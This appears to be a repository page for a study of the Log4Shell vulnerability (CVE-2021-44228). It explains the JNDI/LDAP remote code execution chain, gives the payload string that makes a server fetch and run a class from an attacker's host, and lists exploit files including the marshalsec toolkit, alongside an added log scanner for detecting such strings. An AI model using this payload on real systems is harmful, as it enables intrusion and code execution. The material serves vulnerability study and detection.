Related vulnerability
Description
CVE-2021-44228 vulnerability study
Introduction
# CVE-2021-44228 Analysis
## How does it work?
Below is a detailed walkthrough of a remote code execution case that exploits the Log4Shell vulnerability.
First, there are three parts we need to know:
1. Log4j2 allows logged data to be processed by a feature called **message lookup substitution**, where log messages can include data dynamically pulled from various sources (it supports JNDI lookups).
2. **JNDI Lookup**: allows data to be fetched via the Java Naming and Directory Interface (JNDI) API, which can interact with different directory services.<p align="center" ><img src="image/JNDI.jpg"></p>
3. **LDAP (Lightweight Directory Access Protocol)**: used primarily for accessing and managing directory information services over a network.
---
Here is a simple example of remote code execution:
<p align="center" ><img src="image/how.jpg" title="" alt="" data-align="center"></p>
1. The attacker sets up both an LDAP server (accessed via the LDAP protocol, holding a reference to the malicious Java class) and an HTTP server (where the malicious class is stored).
   1. Set up an HTTP server in the directory that contains the compiled malicious class:<p align="center" ><img src="image/http.jpg" title="" alt="" data-align="center"></p>
   2. Set up an LDAP server that stores the reference:<p align="center" ><img src="image/ldap.jpg" title="" alt="ldap" data-align="center"></p>
2. The attacker sends the malicious input `${jndi:ldap://LDAPSERVER IP:PORT/code}` to a software system that has Log4j2 installed.<p align="center" ><img src="image/software%20server.jpg" title="" alt="" data-align="center"></p>
3. Log4j2 uses the lookup feature to send a request to the LDAP server.
4. The LDAP server redirects the request to the HTTP server via the Java code reference stored on the LDAP server.
5. The HTTP server sends the malicious class back to the software system, which then executes it.
Malicious code:<p align="center" ><img src="image/malicious.jpg" title="" alt="" data-align="center"></p>
Executing the malicious code succeeded:
<p align="center" ><img src="image/result.jpg" title="" alt="" data-align="center"></p>
---
**IMPORTANT**:
1. LDAP is not the only way to reach remote code execution; other methods (such as RMI) work as well, as long as Log4j2 performs the message lookup substitution and ends up executing the malicious code.
2. Different Java versions can change the exploit process (here we are using Java 1.8u112).
3. It is recommended to compile the malicious code with the same Java version as the software (the server using Log4j2), or at least not a higher Java version than the software's.<p align="center" ><img src="image/version.jpg" title="" alt="" data-align="center"></p>
4. The lookup code in Log4j2:<p align="center" ><img src="image/lookup.jpg" title="" alt="" data-align="center"></p>
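From the defender's side, the chain described above (a `${jndi:<scheme>://host:port/...}` string reaching a Log4j2 logger, with LDAP or RMI as the transport) leaves a recognisable marker in whatever was logged. The following is an added detection example, not code from this repository: it scans constructed Apache-style access-log lines for JNDI lookup strings, extracts the scheme and the callback host and port for blocking and incident triage, and reports which lines were affected. The log lines, IP addresses and ports are all made up for the example.

```python
import re

# Matches the literal lookup form used in the write-up above, e.g.
# ${jndi:ldap://host:port/path} or ${jndi:rmi://host:port/obj}, case-insensitively.
# The target group stops at the first "/" or "}" so only host[:port] is captured.
JNDI_PATTERN = re.compile(
    r"\$\{\s*jndi\s*:\s*(?P<scheme>[a-z]+)\s*:\s*//(?P<target>[^/}\s]+)",
    re.IGNORECASE,
)


def find_jndi_lookups(text):
    """Return a list of (scheme, host, port) for every JNDI lookup string in text.

    port is an int when present and numeric, otherwise None.
    IPv4 addresses and hostnames are handled; bracketed IPv6 is not (assumption).
    """
    hits = []
    for m in JNDI_PATTERN.finditer(text):
        scheme = m.group("scheme").lower()
        target = m.group("target")
        host, sep, port = target.rpartition(":")
        if not sep:  # no explicit port in the lookup string
            host, port = target, None
        else:
            port = int(port) if port.isdigit() else None
        hits.append((scheme, host, port))
    return hits


def scan_log(log_text):
    """Scan a multi-line log and return one finding dict per lookup string found."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        for scheme, host, port in find_jndi_lookups(line):
            findings.append(
                {"line": lineno, "scheme": scheme, "host": host, "port": port}
            )
    return findings


def callback_hosts(findings):
    """Sorted, de-duplicated list of host:port indicators to block or hunt for."""
    indicators = set()
    for f in findings:
        indicators.add(f["host"] if f["port"] is None else f"{f['host']}:{f['port']}")
    return sorted(indicators)


# Constructed sample access log: lines 2 and 3 carry lookup strings in the
# User-Agent field, matching the LDAP and RMI cases discussed above.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Dec/2021:14:02:11 +0000] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Dec/2021:14:02:15 +0000] "GET /login HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.23:1389/code}"
203.0.113.9 - - [10/Dec/2021:14:02:19 +0000] "GET /api/v1/user HTTP/1.1" 404 0 "-" "${JNDI:RMI://198.51.100.23:1099/obj}"
203.0.113.11 - - [10/Dec/2021:14:03:01 +0000] "POST /search HTTP/1.1" 200 77 "-" "curl/7.79.1"
"""

if __name__ == "__main__":
    results = scan_log(SAMPLE_LOG)
    for r in results:
        print(f"line {r['line']}: {r['scheme']} lookup to {r['host']}:{r['port']}")
    print("indicators:", callback_hosts(results))
```

A hit from this scan confirms that an attempt reached a log sink; the absence of a hit does not prove safety, because Log4j2 lookups can be nested and encoded in forms this literal pattern does not cover, and the actual fix is to upgrade log4j-core to a patched release rather than to rely on log scanning.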
File snapshot
[4.0K] /data/pocs/f209dcc5e5206025f2505d7ec2a3416adac74114
├── [4.0K] http
│ ├── [ 749] exp.class
│ └── [ 288] exp.java
├── [4.0K] image
│ ├── [ 24K] how.jpg
│ ├── [ 14K] http.jpg
│ ├── [ 25K] JNDI.jpg
│ ├── [ 89K] ldap.jpg
│ ├── [106K] lookup.jpg
│ ├── [ 40K] malicious.jpg
│ ├── [ 84K] result.jpg
│ ├── [ 45K] software server.jpg
│ └── [ 24K] version.jpg
├── [1.0K] LICENSE
├── [4.0K] marshalsec
│ ├── [1.0K] LICENSE.txt
│ ├── [ 195] marshalsec.iml
│ ├── [404K] marshalsec.pdf
│ ├── [7.2K] pom.xml
│ ├── [5.5K] README.md
│ ├── [4.0K] src
│ │ ├── [4.0K] main
│ │ │ └── [4.0K] java
│ │ │ └── [4.0K] marshalsec
│ │ │ ├── [2.0K] BlazeDSAMF0.java
│ │ │ ├── [2.9K] BlazeDSAMF3AM.java
│ │ │ ├── [2.0K] BlazeDSAMF3.java
│ │ │ ├── [3.0K] BlazeDSAMFX.java
│ │ │ ├── [6.1K] BlazeDSBase.java
│ │ │ ├── [1.2K] BlazeDSExternalizableBase.java
│ │ │ ├── [2.0K] Burlap.java
│ │ │ ├── [3.8K] Castor.java
│ │ │ ├── [1.1K] EscapeType.java
│ │ │ ├── [4.0K] gadgets
│ │ │ │ ├── [1.4K] Args.java
│ │ │ │ ├── [1.7K] BindingEnumeration.java
│ │ │ │ ├── [1.8K] C3P0RefDataSource.java
│ │ │ │ ├── [3.1K] C3P0WrapperConnPool.java
│ │ │ │ ├── [1.4K] ClassFiles.java
│ │ │ │ ├── [1.9K] CommonsBeanutils.java
│ │ │ │ ├── [3.0K] CommonsConfiguration.java
│ │ │ │ ├── [1.1K] Gadget.java
│ │ │ │ ├── [2.3K] GadgetType.java
│ │ │ │ ├── [2.0K] Groovy.java
│ │ │ │ ├── [2.9K] ImageIO.java
│ │ │ │ ├── [1.5K] JdbcRowSet.java
│ │ │ │ ├── [ 14K] JDKUtil.java
│ │ │ │ ├── [1.6K] LazySearchEnumeration.java
│ │ │ │ ├── [3.8K] MockProxies.java
│ │ │ │ ├── [1.3K] Primary.java
│ │ │ │ ├── [2.5K] Resin.java
│ │ │ │ ├── [ 351] ResourceGadget.java
│ │ │ │ ├── [2.0K] Rome.java
│ │ │ │ ├── [1.5K] ScriptEngine.java
│ │ │ │ ├── [1.7K] ServiceLoader.java
│ │ │ │ ├── [1.6K] SpringAbstractBeanFactoryPointcutAdvisor.java
│ │ │ │ ├── [1.7K] SpringPartiallyComparableAdvisorHolder.java
│ │ │ │ ├── [1.9K] SpringPropertyPathFactory.java
│ │ │ │ ├── [5.8K] SpringUtil.java
│ │ │ │ ├── [1.3K] Templates.java
│ │ │ │ ├── [4.3K] TemplatesUtil.java
│ │ │ │ ├── [3.5K] ToStringUtil.java
│ │ │ │ ├── [1.8K] UnicastRefGadget.java
│ │ │ │ ├── [1.7K] UnicastRemoteObjectGadget.java
│ │ │ │ └── [2.0K] XBean.java
│ │ │ ├── [2.0K] Hessian2.java
│ │ │ ├── [4.0K] HessianBase.java
│ │ │ ├── [2.0K] Hessian.java
│ │ │ ├── [9.7K] Jackson.java
│ │ │ ├── [2.6K] Java.java
│ │ │ ├── [4.0K] jndi
│ │ │ │ ├── [4.9K] LDAPRefServer.java
│ │ │ │ └── [ 13K] RMIRefServer.java
│ │ │ ├── [4.6K] JsonIO.java
│ │ │ ├── [2.2K] JYAML.java
│ │ │ ├── [2.8K] KryoAltStrategy.java
│ │ │ ├── [2.5K] Kryo.java
│ │ │ ├── [ 11K] MarshallerBase.java
│ │ │ ├── [1.9K] Red5AMF0.java
│ │ │ ├── [1.9K] Red5AMF3.java
│ │ │ ├── [5.5K] Red5AMFBase.java
│ │ │ ├── [3.6K] SideEffectSecurityManager.java
│ │ │ ├── [7.5K] SnakeYAML.java
│ │ │ ├── [2.8K] TestingSecurityManager.java
│ │ │ ├── [4.0K] util
│ │ │ │ └── [2.5K] Reflections.java
│ │ │ ├── [2.0K] UtilFactory.java
│ │ │ ├── [3.0K] XStream.java
│ │ │ ├── [6.6K] YAMLBase.java
│ │ │ └── [2.4K] YAMLBeans.java
│ │ └── [4.0K] test
│ │ └── [4.0K] java
│ │ └── [3.6K] GadgetsTest.java
│ └── [2.6K] untitled4-1.0-SNAPSHOT.jar
├── [2.7K] README.md
└── [4.0K] target server
└── [ 616] HelloLog.java
13 directories, 84 files
Notes
1. It is recommended to access the PoC through its original source first.
2. If the source has been taken down or cannot be reached, send an email to f.jinxu#gmail.com to request the local snapshot (replace # with @).
3. 神龙 has taken a snapshot of this POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.